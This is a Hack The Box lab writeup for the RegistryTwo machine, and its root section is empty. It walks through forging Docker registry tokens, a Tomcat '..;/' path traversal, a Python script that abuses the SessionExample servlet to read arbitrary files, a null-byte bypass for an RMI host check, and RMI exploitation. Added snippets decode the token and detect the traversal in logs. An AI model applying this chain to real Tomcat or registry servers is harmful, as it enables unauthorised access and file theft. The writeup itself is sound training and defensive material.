🔢RegistryTwo - HTB

https://app.hackthebox.com/machines/552

First of all, I won't go into deep detail for every step. Sometimes I'll skip certain aspects, but my focus will be on the vulnerability, the exploit, and how to use them efficiently. This will be a quick and concise writeup.

# Foothold

First, let's start with port 5001.

By fuzzing the web directories, we can find /auth.

You can refer to the Docker registry documentation HERE for further details.

Specifically, HERE explains what to do with the token, but the token first needs further modifications before it can be used to access a registry image and pull it.

"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNjkxMTk1MzMwLCJuYmYiOjE2OTExOTQ0MjAsImlhdCI6MTY5MTE5NDQzMCwianRpIjoiNzI2OTY2MzEyOTQ3MjA0MTI5NyIsImFjY2VzcyI6W119.bgtox4TBEcH_MuNR603paF72sKCIguXsBVKQplZDOqiokMqlEuizFpte4vqlfX_oVNwE_3xh4kU1Y7CERUsVzN8JMMbccgTV-95F1TVwnc1hoYe1w-6rSvHINHi-cGurHSirahbpxQy9iTc1VBNawx2m2sLTRQdFe7E-TTHSdaF0OwDYwtALmW2sCNc9quhRPkbi4c0YusJP0UYajt35WWfJnPbWtlDHlVrttsqvjHWEAQn29CpkvrKFrTI78VfzbVcYyZAoTGnWbqgGDtSLPccn7eyVeJlyTsfwY6gcHkuywi6LUEV7pEZ-R28hhQkBu4eb4EuJgcvLJNOciUTTqA"

As per the documentation, we also need the Www-Authenticate header:

Www-Authenticate:

To craft your own token, add a scope parameter to the auth URL as the documentation suggests; this one requests access to _catalog:

https://webhosting.htb:5001/auth?service=Docker%20registry&scope=registry:catalog:*

Craft another token to get the hosting-app image information:

https://webhosting.htb:5001/auth?service=Docker%20registry&scope=repository:hosting-app:pull

Reading the image information gives you a clue about which web app they are using, along with a lot of other information that helps you find your way to the user foothold.
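As an added example (not part of the original writeup), the script below decodes the registry token quoted above without verifying it and shows why it had to be re-requested with a scope: its "access" claim is empty, so it grants nothing, while a token minted for repository:hosting-app:pull carries an access entry of type "repository". The parse_scope and granted_actions helpers follow the Docker registry token specification (type:name:actions); the auth server's public key is not available, so the signature is not checked and the claims are only inspected, not trusted.

```python
import base64
import json

# Registry bearer token quoted earlier on this page. The auth server's public key
# is not available here, so the signature is NOT verified and nothing below treats
# the claims as trusted; this only shows what the token says it grants.
TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0."
    "eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNjkxMTk1MzMwLCJuYmYiOjE2OTExOTQ0MjAsImlhdCI6MTY5MTE5NDQzMCwianRpIjoiNzI2OTY2MzEyOTQ3MjA0MTI5NyIsImFjY2VzcyI6W119."
    "bgtox4TBEcH_MuNR603paF72sKCIguXsBVKQplZDOqiokMqlEuizFpte4vqlfX_oVNwE_3xh4kU1Y7CERUsVzN8JMMbccgTV-95F1TVwnc1hoYe1w-6rSvHINHi-cGurHSirahbpxQy9iTc1VBNawx2m2sLTRQdFe7E-TTHSdaF0OwDYwtALmW2sCNc9quhRPkbi4c0YusJP0UYajt35WWfJnPbWtlDHlVrttsqvjHWEAQn29CpkvrKFrTI78VfzbVcYyZAoTGnWbqgGDtSLPccn7eyVeJlyTsfwY6gcHkuywi6LUEV7pEZ-R28hhQkBu4eb4EuJgcvLJNOciUTTqA"
)


def b64url_decode(segment):
    """Decode a base64url segment, restoring the '=' padding that JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_jwt_unverified(token):
    """Return (header, claims) of a JWT WITHOUT checking its signature."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    return header, claims


def token_lifetime(claims):
    """Seconds between issue time and expiry, as stated by the token itself."""
    return claims["exp"] - claims["iat"]


def parse_scope(scope):
    """Turn a registry scope string (type:name:actions, actions comma-separated)
    into the access entry shape the registry expects inside the token."""
    resource_type, rest = scope.split(":", 1)
    name, actions = rest.rsplit(":", 1)   # repository names may contain ':'
    return {"type": resource_type, "name": name, "actions": actions.split(",")}


def granted_actions(claims, scope):
    """Which of the actions requested by `scope` does the token's access claim
    actually grant? An empty result means the registry will refuse the request."""
    wanted = parse_scope(scope)
    granted = set()
    for entry in claims.get("access", []):
        if entry.get("type") == wanted["type"] and entry.get("name") == wanted["name"]:
            granted.update(entry.get("actions", []))
    if "*" in granted:
        return set(wanted["actions"])
    return granted & set(wanted["actions"])


if __name__ == "__main__":
    hdr, body = decode_jwt_unverified(TOKEN)
    print("alg:", hdr["alg"], "kid:", hdr["kid"])
    print("issuer:", body["iss"], "lifetime:", token_lifetime(body), "s")
    print("access claim:", body["access"])
    for s in ("registry:catalog:*", "repository:hosting-app:pull"):
        print(s, "->", parse_scope(s), "granted:", granted_actions(body, s))
```

The unscoped token decodes to access: [], which is the registry's way of saying "authenticated, but authorised for nothing"; that is exactly why a fresh token with the scope parameter is needed before _catalog or a pull works. The same decode is useful on the defensive side for checking that an auth server never hands out broader access entries than the requested scope.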

Now we move to port 443.

Register a new user, then log in.

As we learned earlier, they are using Tomcat v9.0.2; referring to HERE, we find that the website is vulnerable to path traversal (..;/).

Now we are able to access the application manager.

We are also able to access the example servlets, through which we can modify session attributes to reach otherwise unavailable resources.
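From the defender's side, the ..;/ traversal leaves an unmistakable trace in the Tomcat access log, because Tomcat strips the ";..." path parameter when it maps the URL while a front proxy that only checks the raw path lets the request through. The following is an added example (not from the writeup) that scans constructed access-log lines in Tomcat's default "%h %l %u %t \"%r\" %s %b" format, URL-decodes each request path (twice, to catch double encoding) and reports requests that used the pattern; the log lines and addresses are made up for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat access-log lines (not captured from the box) in the default
# AccessLogValve pattern: host ident user [time] "request" status bytes.
SAMPLE_LOG = """\
10.10.14.2 - - [04/Aug/2023:23:59:01 +0000] "GET /hosting/ HTTP/1.1" 200 5120
10.10.14.2 - - [04/Aug/2023:23:59:07 +0000] "GET /hosting/..;/manager/html HTTP/1.1" 200 3071
10.10.14.2 - - [04/Aug/2023:23:59:12 +0000] "POST /hosting/%2e%2e;/examples/servlets/servlet/SessionExample HTTP/1.1" 200 1833
10.10.14.5 - - [04/Aug/2023:23:59:30 +0000] "GET /hosting/login HTTP/1.1" 200 2210
10.10.14.5 - - [04/Aug/2023:23:59:41 +0000] "GET /hosting/static/app.js;jsessionid=abc HTTP/1.1" 200 9001
"""

# Common log format: IP, ident, user, [timestamp], "METHOD PATH PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_semicolon_traversal(path):
    """True if the path contains a '..;' segment (after one or two rounds of
    URL decoding). A plain ';jsessionid=...' path parameter does not match."""
    decoded = unquote(unquote(path))
    return re.search(r'(?:^|/)\.\.;', decoded) is not None


def find_traversal_requests(log_text):
    """Return (ip, method, raw_path, status) for every matching request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue                     # skip lines not in the expected format
        if is_semicolon_traversal(m["path"]):
            hits.append((m["ip"], m["method"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, method, path, status in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {status}")
```

A 200 on a traversal request into /manager or /examples is the signal to act on; the usual hardening is to reject ";" in request paths at the reverse proxy and to remove the manager and examples web applications from any Tomcat instance that does not need them.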

As you can see (s_EditingMedia_{tmpID}), you can get {tmpID} by creating a domain and then trying to write/edit index.html or any other file you created.

I have automated the process with this simple Python script:

```python
import requests
import urllib3

# The lab certificate is self-signed; silence the InsecureRequestWarning that
# verify=False would otherwise print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Replace these two placeholders with your own values before running
COOKIE = '{cookie}'   # your JSESSIONID value
TMP_ID = '{tmpID}'    # tmpID of the domain you created

# Tomcat's SessionExample servlet, reached through the ..;/ path traversal
url_post = 'https://www.webhosting.htb/hosting/..;/examples/servlets/servlet/SessionExample'

user_input = input("File PATH: ")

headers_post = {
    'Cookie': f'JSESSIONID={COOKIE}',
    'Content-Type': 'application/x-www-form-urlencoded',
}

# SessionExample stores <datavalue> under the session attribute <dataname>
data = {
    'dataname': f's_EditingMedia_{TMP_ID}',
    'datavalue': user_input,
}

# verify=False because the lab certificate is self-signed
response_post = requests.post(url_post, headers=headers_post, data=data, verify=False)

# Check the response status code
if response_post.status_code == 200:
    print("Request was successful.")
else:
    print(f"Request failed with status code: {response_post.status_code}")
```

Just make sure to change {cookie} and {tmpID} to yours. After you get a successful response, you can refresh the tmpID page to see the file. Also note that you are able to modify the file with whatever you want if you have write access to it.

Now we can get the hosting.war that we found earlier in the Docker registry image we pulled:

/usr/local/tomcat/webapps/hosting.war

View the web page source and scroll down to value=atob(`{BASE64}`).

Extract just the {BASE64} string, remove the rest, and decode it with base64 -d into a hosting.war file.
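The same extraction in script form, as an added example rather than something from the writeup: it locates the value=atob(`...`) payload in page source, base64-decodes it, and confirms the result is a zip archive (a WAR is a zip) before writing it anywhere. The HTML and the embedded archive are constructed in the script itself, so it runs offline; the helper names are the author's own, not part of the target application.

```python
import base64
import io
import re
import zipfile

# Pattern of the embedded payload as it appears in the page source:
#   value=atob(`<base64>`)
ATOB_RE = re.compile(r"value=atob\(`([A-Za-z0-9+/=\s]+)`\)")


def build_sample_war():
    """Constructed stand-in for hosting.war: a minimal zip with one descriptor."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    return buf.getvalue()


SAMPLE_WAR = build_sample_war()

# Constructed page fragment mimicking the layout described above (not the real page)
SAMPLE_HTML = (
    "<html><body>\n"
    "<input type=\"hidden\" id=\"pkg\">\n"
    "<script>document.getElementById('pkg').value=atob(`"
    + base64.b64encode(SAMPLE_WAR).decode()
    + "`);</script>\n</body></html>\n"
)


def extract_embedded_archive(html):
    """Pull the base64 payload out of atob(`...`) and return the decoded bytes.
    Raises ValueError if no payload is present or it is not a zip archive."""
    m = ATOB_RE.search(html)
    if m is None:
        raise ValueError("no value=atob(`...`) payload found in page source")
    raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    if raw[:4] != b"PK\x03\x04":           # local file header magic of a zip/war
        raise ValueError("decoded data is not a zip/war archive")
    return raw


def list_archive(data):
    """Return the member names of a zip/war held in memory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    war = extract_embedded_archive(SAMPLE_HTML)
    print(f"extracted {len(war)} bytes, members: {list_archive(war)}")
    with open("hosting.war", "wb") as fh:   # same result as base64 -d > hosting.war
        fh.write(war)
```

Checking the zip magic before writing the file is a cheap guard against grabbing the wrong atob() string on a page that has several; listing the members afterwards gives a quick sanity check that WEB-INF/ and the classes you want to read are actually there.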

After reading the source code, we know we can set the manager role.

Add &rmi.host={ip} with %00.htb appended to bypass the check.

Now we have to request anything through our created domain to trigger the RMI connection.

I used the ermir tool. Make sure your current Java version is 11 for the payload and exploit to work; you can use the commands below to list/change your Java version:

```shell
update-java-alternatives --list
update-java-alternatives --set java-1.11.0-openjdk-amd64
```

# Docker Escape

After enumeration, we can interact with the RMI server again to escape the Docker container.

You will find all the tools used in my repository.

I brute-forced the developer folder using SecLists' Discovery/Web-Content/dirsearch.txt

and found a hidden file containing credentials.

# Root - Privilege Escalation
